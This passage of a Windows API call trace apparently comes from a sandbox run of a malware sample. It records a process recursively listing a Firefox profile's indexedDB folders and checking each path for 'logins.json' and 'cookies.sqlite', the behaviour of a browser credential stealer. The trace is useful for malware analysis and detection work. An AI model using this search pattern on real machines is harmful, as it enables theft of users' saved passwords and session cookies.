lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\*.*" [0161.077] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\*.*", lpFindFileData=0x2df010 | out: lpFindFileData=0x2df010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb6ff4f30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb701b090, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9b00 [0161.077] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.077] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df010 | out: lpFindFileData=0x2df010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb6ff4f30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb701b090, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.077] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.077] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.077] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df010 | out: lpFindFileData=0x2df010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb701b090, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="moz-safe-about+home", cAlternateFileName="MOZ-SA~1")) returned 1 [0161.077] lstrcmpiW (lpString1="moz-safe-about+home", lpString2=".") returned 1 [0161.078] lstrcmpiW (lpString1="moz-safe-about+home", lpString2="..") returned 1 [0161.078] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned 97 [0161.078] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned 97 [0161.078] lstrlenW (lpString="\\") returned 1 [0161.078] GetProcessHeap () returned 0x8e0000 [0161.078] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc6) returned 0x925698 [0161.078] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" [0161.078] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\" [0161.078] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\") returned 98 [0161.078] lstrlenW (lpString="moz-safe-about+home") returned 19 [0161.078] GetProcessHeap () returned 0x8e0000 [0161.078] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xec) returned 0x925768 [0161.078] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\" [0161.078] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\", lpString2="moz-safe-about+home" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" [0161.078] VirtualQuery (in: lpAddress=0x925698, lpBuffer=0x2defb8, dwLength=0x1c | out: lpBuffer=0x2defb8*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.078] GetProcessHeap () returned 0x8e0000 [0161.078] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925698 | out: hHeap=0x8e0000) returned 1 [0161.078] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned 117 [0161.078] lstrlenW (lpString="") returned 0 [0161.078] GetProcessHeap () returned 0x8e0000 [0161.078] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xec) returned 0x925860 [0161.078] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" [0161.078] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home", lpString2="" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" [0161.078] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned 117 [0161.078] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned 117 [0161.078] lstrlenW (lpString="\\*.*") returned 4 [0161.078] GetProcessHeap () returned 0x8e0000 [0161.078] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xf4) returned 0x925958 [0161.078] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" [0161.078] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\*.*" [0161.078] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\*.*", lpFindFileData=0x2ded98 | out: lpFindFileData=0x2ded98*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb701b090, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9b40 [0161.079] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.079] FindNextFileW (in: hFindFile=0x8f9b40, lpFindFileData=0x2ded98 | out: lpFindFileData=0x2ded98*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb701b090, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.079] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.079] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.079] FindNextFileW (in: hFindFile=0x8f9b40, lpFindFileData=0x2ded98 | out: lpFindFileData=0x2ded98*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb701b090, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".metadata", cAlternateFileName="METADA~1")) returned 1 [0161.079] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned 117 [0161.079] lstrlenW (lpString="\\") returned 1 [0161.079] GetProcessHeap () returned 0x8e0000 [0161.079] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xee) returned 0x925a58 [0161.079] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" [0161.079] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\" [0161.079] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned 118 [0161.079] lstrlenW (lpString=".metadata") returned 9 [0161.079] GetProcessHeap () returned 0x8e0000 [0161.079] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x100) returned 0x925b50 [0161.079] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\" [0161.079] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpString2=".metadata" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata" [0161.079] VirtualQuery (in: lpAddress=0x925a58, lpBuffer=0x2ded40, dwLength=0x1c | out: lpBuffer=0x2ded40*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.079] GetProcessHeap () returned 0x8e0000 [0161.079] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925a58 | out: hHeap=0x8e0000) returned 1 [0161.079] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata", lpSrch="logins.json") returned 0x0 [0161.079] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata", lpSrch="cookies.sqlite") returned 0x0 [0161.079] VirtualQuery (in: lpAddress=0x925b50, lpBuffer=0x2ded4c, dwLength=0x1c | out: lpBuffer=0x2ded4c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.080] GetProcessHeap () returned 0x8e0000 [0161.080] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925b50 | out: hHeap=0x8e0000) returned 1 [0161.080] FindNextFileW (in: hFindFile=0x8f9b40, lpFindFileData=0x2ded98 | out: lpFindFileData=0x2ded98*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb8110d50, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb8110d50, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="idb", cAlternateFileName="")) returned 1 [0161.080] lstrcmpiW (lpString1="idb", lpString2=".") returned 1 [0161.080] lstrcmpiW (lpString1="idb", lpString2="..") returned 1 [0161.080] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned 117 [0161.080] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned 117 [0161.080] lstrlenW (lpString="\\") returned 1 [0161.080] GetProcessHeap () returned 0x8e0000 [0161.080] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xee) returned 0x925a58 [0161.080] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" [0161.080] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\" [0161.080] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned 118 [0161.080] lstrlenW (lpString="idb") returned 3 [0161.080] GetProcessHeap () returned 0x8e0000 [0161.080] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xf4) returned 0x925b50 [0161.080] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\" [0161.080] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpString2="idb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" [0161.080] VirtualQuery (in: lpAddress=0x925a58, lpBuffer=0x2ded40, dwLength=0x1c | out: lpBuffer=0x2ded40*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.080] GetProcessHeap () returned 0x8e0000 [0161.080] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925a58 | out: hHeap=0x8e0000) returned 1 [0161.080] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned 121 [0161.080] lstrlenW (lpString="") returned 0 [0161.080] GetProcessHeap () returned 0x8e0000 [0161.080] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xf4) returned 0x925c50 [0161.080] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" [0161.080] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb", lpString2="" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" [0161.080] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned 121 [0161.080] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned 121 [0161.080] lstrlenW (lpString="\\*.*") returned 4 [0161.080] GetProcessHeap () returned 0x8e0000 [0161.080] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xfc) returned 0x925d50 [0161.080] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" [0161.080] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\*.*" [0161.081] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\*.*", lpFindFileData=0x2deb20 | out: lpFindFileData=0x2deb20*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb8110d50, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb8110d50, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9b80 [0161.081] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.081] FindNextFileW (in: hFindFile=0x8f9b80, lpFindFileData=0x2deb20 | out: lpFindFileData=0x2deb20*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb8110d50, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb8110d50, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.081] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.081] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.081] FindNextFileW (in: hFindFile=0x8f9b80, lpFindFileData=0x2deb20 | out: lpFindFileData=0x2deb20*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb70ff8d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb70ff8d0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb70ff8d0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2a, dwReserved1=0x0, cFileName="818200132aebmoouht", cAlternateFileName="818200~1")) returned 1 [0161.081] lstrcmpiW (lpString1="818200132aebmoouht", lpString2=".") returned 1 [0161.081] lstrcmpiW (lpString1="818200132aebmoouht", lpString2="..") returned 1 [0161.081] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned 121 [0161.081] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned 121 [0161.081] lstrlenW (lpString="\\") returned 1 [0161.081] GetProcessHeap () returned 0x8e0000 [0161.081] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xf6) returned 0x925e58 [0161.081] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" [0161.081] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\" [0161.081] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned 122 [0161.081] lstrlenW (lpString="818200132aebmoouht") returned 18 [0161.081] GetProcessHeap () returned 0x8e0000 [0161.081] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11a) returned 0x918e50 [0161.081] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS 